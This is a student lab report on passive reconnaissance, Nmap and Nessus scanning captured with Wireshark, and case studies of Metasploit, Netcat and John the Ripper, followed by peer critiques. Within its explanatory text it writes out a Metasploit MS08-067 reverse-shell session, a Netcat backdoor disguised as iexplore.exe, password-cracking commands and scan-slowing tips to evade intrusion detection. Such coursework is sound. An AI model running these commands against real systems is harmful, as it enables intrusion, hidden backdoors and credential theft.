Abstract
The first part of the lab is to research passive reconnaissance tools and how they operate. The students will identify whether the tools can recreate the packet stream passively. The ability of tools to change the duration of their tests, and why that ability matters, will also be covered. The next part of the lab includes research on scanning tools such as Nmap and Nessus. These tools will be tested to see whether their scanning activity can be detected on another system using a packet sniffer. The students will also discuss operating system biases for these tools and how the exploits they perform relate to the security tools grid. The methods and results of this test will be discussed in detail. For the last part of the lab, a set of case studies will be discussed, based on research into network penetration tools that have themselves been exploited. The risks to an enterprise that uses untested or exploited tools in penetration testing will also be discussed. The students will discuss all of their findings and report any issues and problems encountered in the lab.
Literature Review
Passive reconnaissance tools are tools that watch other systems without the victim system knowing that it is being watched. Passive reconnaissance tools can be used for blackbox testing as well as whitebox testing. Blackbox testing is the act of purposely injecting errors into a system from an outside perspective, without knowledge of its internal structure, to find any problems within it. Whitebox testing uses the same method but works from the inside perspective, with access to the system's internal structure. Both of the required readings dealt with blackbox and whitebox testing: one covers Privacy Oracle, while the other discusses random testing and blackbox versus whitebox fuzzing.
Patrice Godefroid was invited to the 2007 meeting of the Second International Workshop on Random Testing. The proceedings of his talk can be found in the article called Random Testing for Security: Blackbox vs. Whitebox Fuzzing. In the first part of the article, Godefroid discusses the idea of blackbox fuzz testing. Fuzz testing is the act of randomly mutating well-formed inputs and testing the program on the resulting data (Godefroid, 2007, p. 1). The author proposed whitebox fuzz testing as an alternative to blackbox fuzz testing and set up a model for comparing the two, which he presented to the workshop audience. This is different from the idea that Jung et al. bring up in their article, Privacy Oracle: A System for Finding Application Leaks with Black Box Differential Testing. Jung et al. describe their approach of finding information leaks with Privacy Oracle using black box differential testing, as opposed to Godefroid's proposal to use whitebox testing (Jung, 2008, p. 279).
Godefroid believes that the best approach to testing an application or system is to look at attacks from the inside perspective, instead of the blackbox approach, which looks at attacks from the outside perspective. Godefroid introduced the idea of SAGE, which stands for Scalable, Automated, Guided Execution (Godefroid, 2007, p. 1). The author goes on to note that, even in the early stages of this model, it had already found over 30 new bugs in Windows applications such as image processors, media players, and file decoders (Godefroid, 2007, p. 1). I think Godefroid may be right about his approach to whitebox testing. I think the best way to test a system is to see it from the inside perspective, as opposed to blackbox testing, which looks at it from the outside perspective, as Privacy Oracle does.
Privacy Oracle is a tool that reports on application leaks of user information via the network traffic the applications send. Privacy Oracle treats each application as a black box, without access to either its internal structure or its communication protocols. This means that it can be used over a broad range of applications and information leaks (Jung, 2008, p. 279). Jung et al. found that, right after installation, Privacy Oracle discovered numerous information leaks when they tested 26 different popular applications. The main idea of Privacy Oracle is to look at some of the most common applications that people put on their personal computers and find out what kind of information leaked from these applications could be used to steal their identity. While some of the information found in these applications can be useful to help the individual, some of it can be used for harmful activities (Jung, 2008, p. 279).
Jung et al. set out with a goal when writing this article: to help develop tools and techniques that enable users to find personal information leaks in the applications that they use (Jung, 2008, p. 279). The authors accomplish this goal by creating and implementing a fully automated suite to find the exposure of personal information in these applications. The first part of the test is to use Privacy Oracle to find the information leaks. The second part of the test is to study and take apart the information that is leaked from the applications Privacy Oracle tested (Jung, 2008, p. 280). The authors go into detail about how black box differential testing will work in their experiment. The output is analyzed, and algorithms are used to determine the probability that a given event occurs and personal information is leaked from the application. One of the main algorithms used by the authors is NetDialign, which is the authors' adaptation of Dialign. The tools that the authors studied and tested are as follows: Ad-Aware 2007, OneClick iPod Video Converter, Advanced WindowsCare, RealPlayer, AOL Instant Messenger, Spybot, Avant Browser, VersionTracker Pro, Avast Home Edition, IrfanView, AVG Anti-Virus Free Edition, iTunes Media Player, BearFlix, Limewire, BitComet, MediaCell Video Converter, Camfrog Video Chat, Morpheus, DivX, Windows Media Player, Gmail, WinRAR, ICQ, WinZip, Interactual Player, Yahoo! Messenger (Jung, 2008, p. 284).
Among the findings was that many of the applications tested asked for personal information such as e-mail address, name, age, or gender. All of these items can be used to help steal a person's identity, or at least help someone else masquerade as the individual as far as the applications are concerned. The authors go on to discuss the effectiveness of Privacy Oracle as well as their algorithm, NetDialign. Although this group finds whitebox testing to be better than blackbox testing, Jung et al. give a good counterargument for why people would want to use blackbox testing. The authors state that the downside of their blackbox method is that it could have a harmful effect on the programs that were tested. Privacy Oracle is a good tool to use for blackbox testing, but it does have its downsides, as do many pieces of software that perform penetration testing. It raises the question: does the software itself need to be tested before it can be used to test other applications?
Methods Part 1
OSI 7 Layer Model Layer | Tool Name | McCumber Cube Coordinate
People/8 | Dumpster diving, social engineering | Confidentiality, processing, policy
People/8 | Following FedEx, Telescope, binoculars | Confidentiality, transmission, human
People/8 | Stealing mail | Availability, storage, human
Application/7 | Mbenum, netenum, psinfo, psfile, smtp-vrfy, amap, p0f, sinfp, unicornscan, xprobe2, zenmap, pasco, sleuthkit, vinetto | Confidentiality, storage, technology
Application/7 | Getsids, halberd, httprint, httprint gui, metoscan, mescal http/s, mibble mib browser, onesixtyone, openssl-scanner, smb serverscan, vnc_bypauth, wapiti, 3proxy, gdb server, gnu ddd | Confidentiality, processing, technology
Application/7 | 0trace, relay scanner | Confidentiality, transmission, technology
Application/7 | Gfi languard, ascend attacker, cdp spoofer | Integrity, processing, technology
Application/7 | Goog mail enum, google-search | Integrity, transmission, technology
Application/7 | crunch dictgen | Availability, processing, technology
Presentation/6 | Finger google, googrape, maltego, metagoofil, bruteforcer, isr-form, list-urls, sidguess, collision, wyd, xspy | Confidentiality, storage, technology
Presentation/6 | dcfldd, dd rescue | Confidentiality, processing, technology
Presentation/6 | Sql scanner | Confidentiality, transmission, technology
Session/5 | Airodump-ng, airsnort | Confidentiality, storage, technology
Session/5 | Packet | Confidentiality, processing, technology
Session/5 | Dnstracer, tcptraceroute, tctrace, ike-scan, superscan | Confidentiality, transmission, technology
Session/5 | Thc pptp, tcpick, urlsnarf, hotspotter, karma, pcapsipdump | Integrity, storage, technology
Session/5 | carwhisperer, minicom | Integrity, processing, technology
Session/5 | sipdump, sip | Availability, processing, technology
Transport/4 | Dnswalk, mboxgrep, memfetch | Confidentiality, storage, technology
Transport/4 | snmp scanner, httpcapture, mailsnarf, smb sniffer | Confidentiality, transmission, technology
Transport/4 | Icmp redirect, icmpush, igrp spoofer, irdp responder, irdp spoofer, wireshark, wireshark wifi, icmptx, pcaptpsip | Integrity, processing, technology
Transport/4 | Firewalk | Integrity, transmission, technology
Transport/4 | Smb dumpusers | Availability, processing, technology
Network/3 | dnspredict, subdomainer, angry ip scanner | Confidentiality, storage, technology
Network/3 | protos | Confidentiality, processing, technology
Network/3 | Ass, Autoscan, genlist, cryptcat, netdiscover, Whois, nmap, scanmetender, superscan, unicornscan, nhs nohack, ping, protos, scanline, scanrand, revhosts, dnsspoof, driftnet, etherape, netsed, netenum, netmask, ntop, sing, smap | Confidentiality, transmission, technology
Network/3 | ltrace, yersinia | Integrity, transmission, technology
Network/3 | Spike | Availability, processing, technology
Data Link/2 | host, nmbscan | Confidentiality, storage, technology
Data Link/2 | Tftp brute | Availability, processing, technology
Physical/1 | wiassistant, hstest | Integrity, transmission, technology
Kinetic/0 | N/A | N/A |
Findings
Snort is a tool that is able to recreate the packet stream passively. The purpose of this is to analyze the data streams for signatures that indicate an attack is underway. Other IDS tools also have this ability, as does Netperf. The reason these tools recreate packet streams is to ensure that, if an attack occurs, the traffic involved can be reconstructed and examined. One can slow a script or tool down by configuring it to spread its probes over a longer period; Nmap, for example, provides timing templates (-T0 through -T5) and a --scan-delay option for exactly this purpose. Whether it is better for the attack to take longer than milliseconds depends on the tool. Generally, a script or tool that completes in milliseconds is easier to detect. If the tool or script takes longer, it will be harder for a defender to recreate the data streams, because the attack traffic may blend in with legitimate traffic. Even so, a slowed scan is still considered active rather than passive.
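As a brief illustration of this kind of slowdown (a sketch only, reusing the 192.168.1.1 target address from Part 2A of this lab), Nmap's --scan-delay option stretches a scan out by pausing between probes:

sudo nmap -sS --scan-delay 15s -p 1-1024 192.168.1.1

With fifteen seconds between probes, scanning the first 1024 TCP ports takes over four hours instead of seconds, which makes the probes far less likely to trip a threshold-based port scan alarm, though the scan remains active traffic.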
Methods Part 2A
First, Nessus and Nmap were installed on a Linux virtual machine running Ubuntu. The installation was performed by invoking the following command: “sudo apt-get install nmap nessus nessusd nessus-plugins”. Once these tools were installed, a registration code was required to update the plugins. The registration code was obtained from http://www.nessus.org/plugins/index.php?view=register. Next, Nessus was registered by entering the following command: “nessus-fetch --register [registration code]”. The plugins were then obtained using the “nessus-update-plugins” command. To run Nessus, a user account must be created for logging in to the Nessus server. A Nessus user account was created by invoking the “nessus-adduser” command and entering a username and password.
In order to run Nessus, the nessusd daemon must be running (either on the local host or on another server). The nessusd daemon was started by invoking the “sudo nessusd &” command (it can also be started using “/etc/init.d/nessusd start”). Nessus was then started using the “nessus &” command. Once the Nessus application had launched, the user logged in to the server (running on the local host) using the credentials created with the nessus-adduser command. Next, under the “Plugins” section, all plugins were chosen. Then, under the “Targets” section, the IP address of a Windows XP SP3 virtual machine was entered (192.168.1.1). The scan was then started and a report was created. Finally, the command “sudo nmap -sS -O 192.168.1.1” was used to perform the Nmap scan.
Findings
Nessus scans for approximately 1000 types of vulnerabilities. This allows an attacker to sieve the information more quickly, because it only takes a few packets for Nessus to discover a vulnerable port on the target system. I think that if the Nessus vulnerabilities were put into a grid, like the tools have been in previous labs, patterns would emerge. Just as the security tools fit into the OSI model, the specific attacks will also fit. Different attacks will fit into the OSI model at different layers, depending on what protocols they use and at what layer of the OSI model they can be exploited.
Nessus and Nmap have some biases based on the operating systems they test. Based on the numbers obtained from http://www.nessus.org/plugins/index.php?view=all, most of the vulnerabilities pertain to Windows operating systems (Tenable Network Security, 2009). However, there are plugins for testing all sorts of operating systems. I think the reason for the large number of plugins targeting Windows systems is the popularity of that operating system. The plugins are written by the people who use Nessus; if there are more Windows clients and servers that need to be tested, more plugins will be written to test those machines. When considering biases pertaining to Nmap, I think it follows a similar model. While Nmap simply looks for open ports, regardless of the operating system, the community controls the operating system detection. Users who submit known operating system fingerprints to the Nmap database help Nmap properly identify those operating systems in future scans.
After the initial scans were performed, the scans were performed again. This time, the scans were captured using Wireshark. Before the capture was started, Wireshark was launched on a BackTrack virtual machine by typing “sudo wireshark &” into the terminal. Once Wireshark launched, it was set to capture all traffic on the eth1 interface, which is the adapter for the private network (192.168.1.0/24). Next, the Nessus security scan was started. Once the scan completed, all packets captured in Wireshark were saved and a report was created in Nessus. Then, a new live capture was started in Wireshark. This time, Nmap was used to scan the Windows XP SP3 virtual machine. The command used to start the Nmap scan was “sudo nmap -sS -O 192.168.1.1”. Once the scan was complete, the Wireshark capture was saved.
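For reference, an equivalent capture could also be collected with a command-line sniffer; a minimal sketch, assuming the same eth1 interface and target address used above (the output file name is arbitrary):

sudo tcpdump -i eth1 -s 0 -w nessus-scan.pcap host 192.168.1.1

The -s 0 option records full packets rather than truncated headers, and the resulting file can then be opened in Wireshark for the same analysis described below.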
After reviewing the telemetry gathered from the Nessus and Nmap scans, one can see that the scans can clearly be captured. Wireshark was chosen as the method for capturing network traffic instead of dsniff because Wireshark is a general-purpose tool, while dsniff looks for specific data in packets, such as passwords. Since all of the packets are captured in real time, both the packets sent from the machine running the security-testing tool and the replies from the machine being audited can be seen. For instance, consider the following packet information, which was captured with Wireshark during the Nessus security scan:
Packet 1:
No. Time Source Destination Protocol Info
15 6.997810 192.168.1.2 192.168.1.1 TCP 55158 > 3com-tsmux [SYN] Seq=0 Win=5840 Len=0 MSS=1460 TSV=89034 TSER=0 WS=5
Frame 15 (74 bytes on wire, 74 bytes captured)
Ethernet II, Src: Vmware_bb:75:ac (00:0c:29:bb:75:ac), Dst: Vmware_76:2e:9a (00:0c:29:76:2e:9a)
Internet Protocol, Src: 192.168.1.2 (192.168.1.2), Dst: 192.168.1.1 (192.168.1.1)
Transmission Control Protocol, Src Port: 55158 (55158), Dst Port: 3com-tsmux (106), Seq: 0, Len: 0
Packet 2:
No. Time Source Destination Protocol Info
16 6.997931 192.168.1.1 192.168.1.2 TCP 3com-tsmux > 55158 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
Frame 16 (60 bytes on wire, 60 bytes captured)
Ethernet II, Src: Vmware_76:2e:9a (00:0c:29:76:2e:9a), Dst: Vmware_bb:75:ac (00:0c:29:bb:75:ac)
Internet Protocol, Src: 192.168.1.1 (192.168.1.1), Dst: 192.168.1.2 (192.168.1.2)
Transmission Control Protocol, Src Port: 3com-tsmux (106), Dst Port: 55158 (55158), Seq: 1, Ack: 1, Len: 0
Of course, what is shown above is not all of the packet data (though all of the packet data was captured), but one can see both parts of the communication. Also, detecting that this is in fact a Nessus scan is easy, because it runs through many different ports and protocols very quickly. The same technique works with Nmap. Using this data, an attacker can simply search the capture file for all protocols or ports that are known to be vulnerable or easily exploitable and read the packet data to determine the outcome of that port or protocol's security test. As long as the vulnerability types are known, a port/protocol list can be used, and when this traffic matches activity on the network, it can be determined that a Nessus scan did, in fact, occur. Studying the Nessus traffic is important for an attacker. Even if a Nessus scan occurs, if the network is already saturated with data, it may be difficult to sieve out all of the important information. Therefore, an attacker should study how Nessus operates, to understand what packets are used and how many are needed to determine vulnerabilities, in order to find the meaningful data among much meaningless data.
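To pull the scan back out of a busy capture, a display filter can be applied either in the Wireshark filter bar or on the command line with tshark; a sketch, assuming the capture was saved as nessus-scan.pcap and the scanning host is 192.168.1.2 as in the packets above:

tshark -r nessus-scan.pcap -R "ip.src == 192.168.1.2 && tcp.flags.syn == 1 && tcp.flags.ack == 0"

This lists only the initial SYN probes sent by the scanning host, one per port tested, so the port and protocol pattern of the Nessus or Nmap scan can be read off directly.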
What can one use the capturing of legitimate data for? Capturing legitimate data can be used by an attacker to discover vulnerabilities in the network without allowing their presence to be known. In addition to simply capturing all data on a network and waiting for a Nessus scan to occur, there is an easier way to obtain this important data without capturing all data. A tool such as Snort can detect when a port scan is occurring and can be configured to generate alerts or run commands when detected. This tool could detect the Nessus scan and then begin to capture all packets to and from the machine running Nessus. When an attacker performs an Nmap or Nessus scan against a network, it’s a good idea to slow down the attack to prevent an IDS system from detecting the scan. This method may also be beneficial to security testers to help prevent attackers from obtaining telemetry from the scan and exploiting it before the security tester can properly patch the security holes.
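A minimal sketch of how such detection might be enabled, assuming Snort's sfportscan preprocessor is available (the option values shown are illustrative, not tuned recommendations):

preprocessor sfportscan: proto { all } scan_type { all } sense_level { low }

With a line such as this in snort.conf, Snort raises a portscan alert when a single host probes many ports in a short window; that alert can then serve as the trigger to begin capturing all traffic to and from the suspected Nessus host.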
The results of this test show that it is, in fact, possible to gain telemetry from an active tool by using a passive tool. This is because both the request and the response can be captured, and therefore dissected, in order to recover the results of the scan. This test also shows that tools such as dsniff are not as effective, because of their focus on retrieving specific types of data rather than capturing all of the packets sent to and from a machine running Nessus, as Wireshark does. However, when considering the infiltration of legitimate security audits, IDS tools such as Snort may provide a good way to automatically sift out unimportant packets. This lab indicates the importance of viewing the packets used in a Nessus scan to determine how to detect a scan and how to determine vulnerabilities using a passive tool rather than an active tool. This is important because it allows an attacker to remain silent on the network while performing reconnaissance. This, of course, raises the question: how does one detect an attacker performing passive reconnaissance or, at least, minimize the information available to the attacker? While machines in promiscuous mode can sometimes be detected, detection can be difficult. Therefore, machines in promiscuous mode should be searched for, but the existence of an undetected promiscuous node should still be assumed. Also, active security tests should be performed as an attacker would perform them. By minimizing the obviousness of a security test being performed, the likelihood of an attacker using passive reconnaissance to exploit this telemetry will also be minimized.
Part 2B
Open-source tools are an economical way to test the security of your network; unfortunately they’re available to both ethical and unethical attackers. (Ballard, 2006).
The good news is that there are plenty of open-source tools available to test the security of networks and alter network settings. They are freely available as part of an operating system or over the Internet, and they usually cover a wider range and scope than off-the-shelf security products. Often, these open-source tools have more features than comparable commercial options (though this can mean more complexity). In general, these tools are easy to acquire and install (Ballard, 2006).
The bad news is that would-be attackers know about and have access to these tools, too. Therefore, it is imperative to know how intruders can use these tools against an organization and how to recognize when one is at work on the network.
Open-source network security tools fall into three main categories: those that probe the network; those that listen on the network; and those that alter the network (Ballard, 2006).
Although my research led me to a variety of open source penetration tools that have now become attack tools, this section focuses on Metasploit, John The Ripper 1.0, and NetCat.
Metasploit
Metasploit is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. To the average user, one of the great mysteries of computing is how hackers and security researchers discover vulnerabilities in applications. There really are no special techniques needed to find vulnerabilities; it just takes a lot of experience and knowledge (http://sectools.org/sploits.html).
Metasploit was originally released as a research project; however, it will certainly find use within the hacker community. Like other virus and worm “toolkits” circulating freely, Metasploit allows people with limited abilities to leverage the skills of others to create hostile code that exploits vulnerabilities in applications and operating systems, including all major Windows versions (http://sectools.org/sploits.html).
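To illustrate how little effort the framework requires of its operator, a hypothetical msfconsole session against an unpatched Windows target might look like the following (the module, payload, and addresses are illustrative assumptions, not steps performed in this lab):

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
exploit

Five commands, none of which require any understanding of the underlying vulnerability, are enough to attempt a full compromise; this is exactly the double-edged quality described above.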
There is no doubt that Metasploit makes it almost trivial to create hostile code. For security researchers and administrators, it is undoubtedly a great way to proactively detect flaws in their applications and learn how to better defend networks against attacks. When it comes down to it, hackers already have this understanding. But tools such as Metasploit, while presenting the potential for abuse, also have the potential to teach, and to empower the good guys with the knowledge the hackers already have.
Case Study
This case study describes how H.D. Moore and his Metasploit colleagues created an exploit of the now-patched Vector Markup Language (VML) vulnerability in Internet Explorer. This exploit was undetected by 26 virus scanning engines, including those from Kaspersky, McAfee, Microsoft, and Symantec. Moore also created a zero-day exploit, one unleashed before there is a known remedy, to take advantage of a vulnerability in Microsoft's Windows Metafile. This prompted Microsoft to take the unusual step of releasing a patch five days ahead of its software-patch schedule. Even though Moore added to his prestige and forced Microsoft to fix its problem sooner, he also left Internet Explorer more vulnerable than if he had worked discreetly with Microsoft (Greenemeier, 2006).
There are two ways to look at Moore and his team: they either give malicious hackers a better ability to attack customers of Microsoft and other popular products, or they show tough love to software companies so that they will produce more secure products.
NetCat
Netcat is one of the most commonly used anti-hacking tools. Netcat makes and accepts Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections. Netcat writes and reads data over those connections until they are closed. It provides a basic TCP/UDP networking subsystem that allows users to interact manually or via script with network applications and services on the application layer. It lets users see raw TCP and UDP data before it gets wrapped in the next highest layer such as File Transfer Protocol (FTP), Simple Mail Transfer Protocol (SMTP), or Hypertext Transfer Protocol (HTTP) (http://technopedia.info/tech/2006/02/22/everything-you-need-to-know-about-netcat.html).
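For example, a legitimate use is speaking to a service by hand; a small sketch, reusing the lab's 192.168.1.1 address as the target (and assuming a web server is listening on port 80):

nc -v 192.168.1.1 80

Once the connection opens, a raw request such as "HEAD / HTTP/1.0" can be typed in and the server's unparsed response read back, which is exactly the layer-by-layer visibility described above.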
However, Netcat's -e option, which executes a program and attaches it to a network connection (and which is enabled at compile time by a flag the authors themselves named GAPING_SECURITY_HOLE), can make Netcat dangerous in the wrong hands.
Case Study
This case study is about how hackers run Netcat. The attacker creates a copy of Netcat called iexplore.exe and runs a backdoor listening on TCP port 2222. Users or administrators searching for a malicious process would likely overlook this extra little goodie running on the box, as it looks completely reasonable. Giving a backdoor a name like iexplore.exe is pretty sneaky. However, an attacker could do something even worse by taking advantage of an interesting characteristic of Windows 2000, XP, and 2003. In these operating systems, the Task Manager will not allow you to kill processes that have certain names. If a process is named winlogon.exe or lsass.exe, the system automatically assumes that it is a sensitive operating system process based solely on its name.
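A sketch of the listener described in this case study, as it might be started on the compromised Windows host (the renamed binary is the attacker's copy of Netcat, and the port number matches the scenario above):

iexplore.exe -l -p 2222 -e cmd.exe

The attacker then connects from another machine with "nc <victim address> 2222" and receives a command shell, while Task Manager shows nothing more suspicious than an apparent Internet Explorer process.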
John The Ripper 1.0
John the Ripper 1.0 (JTR) is a free password-cracking program popular with hackers and security experts. The program was actually designed for the legitimate use of finding and cracking feeble passwords, with a view to improving the security of the system by replacing them with stronger passwords. But the program has also found its place within the hacker's world (http://sectools.org/sploits.html).
Provide JTR with an encrypted password file, and it will rip the file apart until it knows every password for every user on the network. JTR employs methods such as dictionary attacks, where it tries thousands of words from a wordlist in hopes of finding a match, and brute force, where it systematically experiments with millions of character combinations until it stumbles upon a password.
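As an illustration of those two modes (the hash file name is hypothetical, and exact option syntax varies between JTR versions), typical invocations look like the following:

john --wordlist=password.lst passwd.txt
john --incremental passwd.txt
john --show passwd.txt

The first command runs a dictionary attack against the hash file, the second switches to brute-force (incremental) mode against the same file, and the third prints whatever passwords have been recovered so far.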
Case Study
How do most professional hackers use John the Ripper (JTR)?
It depends on what they are trying to achieve. If they just want to prove a point, JTR in single crack mode can reveal the weakest passwords in seconds and demonstrate the need for a good password policy. Most use longer runs when they want to leverage the passwords they find to get deeper.
From the research, it seems that most professionals use JTR on Linux. They use it to crack both single passwords and groups of passwords, and they typically do not run it for more than a few days; however, the number of hashes they get from a box determines how many they run JTR against, and they will continue to run it on a non-production machine until the engagement is close to reporting.
Are there ways to ensure the tools you are using are not hostile?
Only approved software should be operated on the organization’s network. This is so hostile programs cannot gain access to the network. Hostile programs may be written with some useful functionality, but may perform a hidden task that the user is not aware of. The ways to help determine whether a program is hostile include:
- Does the program come from a reliable source?
- Is there proof that the program came from that source, such as a digital signature or a published checksum? (A brief verification example follows this list.)
- If the source code is available for the program, the code may be checked to be sure there is no hostile content.
- A reliable third party may be able to check out the software and certify that it is safe.
- Does the creator of the program attempt to hide their identity? If the creator of the program attempts to hide their identity then there may be reason for suspicion. If the program creator does not hide their identity and can be reached, it is less likely that the program is a hostile program.
- Has this program been run by other people or organizations for some period of time with no adverse consequences?
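As a concrete sketch of the proof-of-source check mentioned in the list above (the file names are hypothetical, and the commands assume a Unix-like host with the project's public key already imported), a downloaded tool can be verified before it is ever run:

md5sum nmap-4.76.tar.bz2
gpg --verify nmap-4.76.tar.bz2.asc nmap-4.76.tar.bz2

If the checksum does not match the value published by the project, or the signature does not verify against the developer's public key, the download should not be trusted, no matter how useful the tool appears to be.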
Some of the above issues are not proof that a program is safe, but are merely indicators. Computer security is not an exact science and it is a matter of reducing the chance of an intrusion. Probably the best method of being sure of the reliability of a program is to allow a reliable third party to check the program. Program writers may even send source code to these service providers for certification with source code covered by a nondisclosure agreement.
What is the process of source code auditing?
Software vulnerabilities are a growing problem. Moreover, many of the mistakes leading to vulnerabilities are repeated often. Source code auditing tools could be a great help in identifying common mistakes, or in evaluating the security of software. The effectiveness of auditing tools can be assessed using the following criteria: the number of false positives, the number of false negatives by comparison to known vulnerabilities, and the time required to validate the warnings related to vulnerabilities. In small and medium scale projects, the open source program Pscan can be useful in finding a mix of coding style issues that could potentially enable format string vulnerabilities, as well as actual vulnerabilities. The limitations of Pscan were more obvious in large-scale projects like OpenBSD, as more false positives occurred. Clearly, auditing source code for all vulnerabilities remains a time-consuming process, even with the help of current tools, and more research is needed in identifying and avoiding other common mistakes (Heffley & Meunier, 2004). Auditing source code in an enterprise-wide environment would be extremely time consuming.
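The kind of pattern such tools look for can be approximated, very crudely, with plain text searches; a rough sketch (far less precise than Pscan and prone to the same false positives discussed above) that hunts for printf-family calls whose format argument is not a string literal:

grep -rn "printf(" src/ | grep -v 'printf("'

Any surviving call such as printf(user_input) is a candidate format string vulnerability worth manual review; a real auditing tool performs this check by parsing the code rather than matching text, which is why validating its warnings still consumes analyst time.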
What are the risks of using untested or exploited penetration tools?
Penetration testing can be an invaluable technique in any organization's information security program. Basic white box penetration testing is often done as a fully automated, inexpensive process. However, black box penetration testing is a labor-intensive activity and requires expertise to minimize the risk to targeted systems. At a minimum, it may slow the organization's network response time due to network scanning and vulnerability scanning. The possibility exists that systems may be damaged or rendered inoperable in the course of penetration testing, even though the organization benefits from knowing that the system could have been rendered inoperable by an intruder. Although this risk is mitigated by the use of experienced penetration testers, it can never be fully eliminated (http://www.bankinfosecurity.com/html/webinar-penetration-testing.html).
Issues and Problems
The only issues with the lab had to do with the Linux virtual machine. On the Debian virtual machine, after installing many packages such as Xorg, Fluxbox, and the plugins needed to get Nessus to work, the drive ran out of space and was remounted as read-only. As a workaround, an Ubuntu virtual machine with more space allocated was created.
Conclusions
In conclusion, this lab was very informative. It required the group to think more critically about tools that perform passive reconnaissance. The lab required the group to research passive tools, information pertaining to the timing of active tools, and the relationship between those tools. The group discovered that if tools take longer to run, they are less likely to be detected. When considering Nessus and Nmap, the group discovered that the data streams can be captured in order to passively obtain the vulnerabilities returned by Nessus. The research gathered helped the group answer questions about what this kind of attack means to attackers and security auditors alike. Finally, the group researched how security tools have themselves been vulnerable to attack, and discussed the risks to enterprises when security-testing tools are not security tested.
Bibliography
Ballard. (2006). Crash course: Open-source security tools a double-edged sword. Network Computing. Retrieved June 26, 2009, from http://www.networkcomputing.com/showitem.jhtml?docid=1712crash
Everything you need to know about Netcat. (2006, February 22). Technopedia. Retrieved June 26, 2009, from http://technopedia.info/tech/2006/02/22/everything-you-need-to-know-about-netcat.html
Godefroid, P. (2007). Random testing for security: Blackbox vs. whitebox fuzzing. Proceedings of the Second International Workshop on Random Testing, Atlanta, GA.
Greenemeier, L. (2006). Is the Metasploit hacking tool too good? InformationWeek. Retrieved June 26, 2009, from http://www.informationweek.com/news/infrastructure/management/showArticle.jhtml?articleID=193401125
Heffley, J., & Meunier, P. (2004). Can source code auditing software identify common vulnerabilities and be used to evaluate software security? Proceedings of the 37th Hawaii International Conference on System Sciences. Retrieved June 26, 2009, from http://www2.computer.org/portal/web/csdl/doi/10.1109/HICSS.2004.1265654
Jung, J., Sheth, A., Greenstein, B., & Wetherall, D. (2008). Privacy Oracle: A system for finding application leaks with black box differential testing. Proceedings of the 15th ACM Conference on Computer and Communications Security.
Making the case for penetration testing. (n.d.). BankInfoSecurity.com. Retrieved June 27, 2009, from http://www.bankinfosecurity.com/html/webinar-penetration-testing.html
Tenable Network Security. (2009). Plugins. Retrieved June 27, 2009, from http://www.nessus.org/plugins/index.php?view=all
Top 3 vulnerability exploitation tools. (n.d.). SecTools.Org: Top 100 network security tools. Retrieved June 26, 2009, from http://sectools.org/sploits.html
The abstract, while not a major part of the lab exercises, is more of a restatement of the objectives than a summary of the activities performed in the lab. The literature review has a few spelling and grammatical errors that make it slightly difficult to read. One major criticism is that the difference between blackbox and whitebox testing is not explored in enough depth. Saying that whitebox testing “looks at the inside perspective” doesn't really tell the reader much about whitebox testing. Inside of what? Another major criticism is that the topic of passive reconnaissance is examined only in light of the readings given out with the lab exercises. Passive reconnaissance is much more than blackbox and whitebox application testing. The lab exercises are a good example of passive reconnaissance against a network.
It would've been nice to see the methodologies before presenting the table of passive attack tools, to give the reader a reference for how the information was gathered and formatted. Maybe that would explain the presence in the table of tools that are most definitely active reconnaissance tools, such as XProbe2 (a port scanner and TCP/IP fingerprinting tool) and GFI LanGuard (a network security scanner).
The findings paragraph mentions tools that are not in the table. Are these findings separate from the work done to create the table? The last part of the findings section, regarding the timing of the attack or script traffic, is weak. It describes what may happen when delaying the traffic from a program or script of an active reconnaissance tool, but it doesn't view this information in light of the subject of passive reconnaissance. The statement that it will be “easier to detect a script or tool if it takes milliseconds” needs some backing. What if the attack is so fast that it's missed by an IDS system that only samples every couple of seconds?
The findings for part 2a were insufficiently detailed. How does the fact that Nessus scans for 1000s of vulnerabilities allow an attacker to sieve through the information more quickly? How do you know it only takes a few packets to discover a vulnerable port? What patterns might emerge from putting the vulnerabilities Nessus finds into a table? The operating system bias is valid but what other patterns might emerge? Are there any cross platform vulnerability types that occur more than others?
I think the point of 2B was missed entirely. The point of this exercise was to evaluate tools that had been advertised and published as security tools but had secret backdoors installed that compromised the systems of the attacker. The section of 2B on determining whether or not a tool is hostile is on the right track with respect to the purpose of this part of the exercise. Finally, the citation for “Precision and accuracy of network traffic generators for packet-by-packet traffic analysis” isn't properly formatted in APA5.
Team one did a decent job of explaining what was going to be accomplished in the lab. The abstract did not meet the length requirements set out in the syllabus, and it read more like the list of objectives in the lab three design guide. However, the abstract did explain the tasks that would be performed in lab three. In the literature review section, team one began with an introduction explaining the general topics of the articles, and then went right into the first article, the one from Patrice Godefroid. From the literature review it is apparent that the team made an attempt to create cohesion between the articles, which should have been simple, as there were only two of them and the second seemed to pick up where the first left off. That attempt, however, did not end in success; rather, team one has once again created a list of the thoughts presented in each article, almost entirely independent of each other, explaining what each article was about, followed by the literature review author's personal opinion on each. There appears to be no attempt to answer the questions presented in the syllabus for the literature review, and no attempt to integrate the literature into the lab. I call into question the sentence that begins “Some of the findings that Privacy Oracle found.” The tool found findings? In my experience, researchers generate findings from data created by the tools they use.

The methods section of team one's lab jumps right into the table that needed to be created as per part one of lab three, with no explanation of what is going on outside of the abstract at the beginning. I question team one's classification of stealing mail as a passive attack. Stealing mail would be the same as intercepting and diverting a network packet; the act of not receiving the packet (or parcel) means that the victim would be aware of the attack, making it active rather than passive in nature. Each part of the lab is broken down into its own methods and findings section. This does not create a lab document that flows from beginning to end or allow others to recreate the experiments of lab three in any meaningful way, nor does it follow the guidelines set out in the syllabus. There are no unified methods or findings sections, and that left me confused upon first reading. The methods that team one does present are lacking, are not at all a form of academic or scientific method, and fail to explain the strategy or techniques used to answer the questions presented in the lab design document.

A unified findings section appears to have been at least attempted, but after review it is apparent that the three members of team one did not collaborate well in the creation of a final lab document. Team one states in their findings that Nessus and Nmap have a bias towards Windows machines; team three later states that Nessus and Nmap have a bias towards UNIX-style machines. This calls into question both teams' results as either a guess or a lack of understanding of the lab. Team one's case studies seem to suggest a lack of understanding of that particular part of the lab. They present tools that “hackers” are known to generally use, and how they use them. This was not the goal; rather, the goal was to study tools used as security defense tools that were themselves at one point or another the attack vector in an exploit, tools that turn the attacker into the attacked.
